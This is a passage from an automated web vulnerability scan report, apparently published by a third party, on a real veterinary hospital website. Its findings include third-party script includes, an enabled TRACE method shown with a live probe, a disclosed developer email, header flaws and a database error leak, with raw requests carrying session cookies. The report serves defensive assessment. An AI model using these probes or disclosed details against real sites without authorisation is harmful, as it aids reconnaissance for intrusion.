
Response

8.11. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:44:43 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...

8.12. http://www.vcahospitals.com/plymouth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

GET /plymouth HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 11194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...

8.13. http://www.vcahospitals.com/plymouth/appt.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth/appt.html

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:44:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...

8.14. http://www.vcahospitals.com/plymouth/more/boarding.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth/more/boarding.html

Issue detail

The response dynamically includes the following script from another domain:

http://vca.unicaondemand.com/ods/js/imodTag.js

Request

GET /plymouth/more/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:58 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
</script>
<script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"></script>
...[SNIP]...

9. TRACE method is enabled previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.vcahospitals.com
Cookie: 47e4c605f508f2ef

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:03:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vcahospitals.com
Cookie: 47e4c605f508f2ef

10. Email addresses disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/js/jquery.tablesorter.js

Issue detail

The following email address was disclosed in the response:

christian.bach@polyester.se

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /js/jquery.tablesorter.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:13 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
Last-Modified: Mon, 20 Apr 2009 21:39:56 GMT
ETag: "10000000071c4-5b46-468035f114300"
Accept-Ranges: bytes
Content-Length: 23366
Content-Type: application/javascript

/*
*
* TableSorter 2.0 - Client-side table sorting with ease!
* Version 2.0.3
* @requires jQuery v1.2.3
*
* Copyright (c) 2007 Christian Bach
* Examples and docs at: http://tablesorter.com
*
...[SNIP]...
ean flag indicating if tablesorter should display debuging information usefull for development.
*
* @type jQuery
*
* @name tablesorter
*
* @cat Plugins/Tablesorter
*
* @author Christian Bach/christian.bach@polyester.se
*/

(function($) {
   $.extend({
       tablesorter: new function() {

           var parsers = [], widgets = [];

           this.defaults = {
               cssHeader: "header",
               cssAsc: "headerSortUp",
               cssDesc: "heade
...[SNIP]...

11. HTML does not specify charset previous next
There are 2 instances of this issue:

/tools/SMSComm.php
/tools/markers_sema.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

11.1. http://www.vcahospitals.com/tools/SMSComm.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/tools/SMSComm.php

Request

POST /tools/SMSComm.php HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Origin: http://www.vcahospitals.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.24.10.1299326665
Content-Length: 42

hospitalId=1122030&targetPhone=14445559999

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 92
Content-Type: text/html

<h3>WE'RE SORRY</h3><p>There was a problem sending your message. Please try again later.</p>

11.2. http://www.vcahospitals.com/tools/markers_sema.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/tools/markers_sema.php

Request

GET /tools/markers_sema.php?sema=E13 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwX-Requested-With:%20XMLHttpRequestAccept:%20*/*User-Agent:%20Mozilla/5.0%20(Windows;%20U;%20Windows%20NT%206.1;%20en-US)%20AppleWebKit/534.13%20(KHTML,%20like%20Gecko)%20Chrome/9.0.597.107%20Safari/534.13Accept-Encoding:%20gzip,deflate,sdchAccept-Language:%20en-US,en;q=0.8Accept-Charset:%20ISO-8859-1,utf-8;q=0.7,*;q=0.3Cookie:%20PHPSESSID=
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299327491.1.2.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAwX-Requested-With:%20XMLHttpRequestAccept:%20*/*User-Agent:%20Mozilla/5.0%20(Windows; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.2.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 52
Content-Type: text/html

Can't connect to MySQL server on 'localhost' (10061)

12. Content type incorrectly stated previous
There are 2 instances of this issue:

/tools/SMSComm.php
/tools/markers_sema.php

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

12.1. http://www.vcahospitals.com/tools/SMSComm.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/tools/SMSComm.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

12.2. http://www.vcahospitals.com/tools/markers_sema.php previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/tools/markers_sema.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

Report generated by XSS.CX at Sat Mar 05 06:53:38 CST 2011.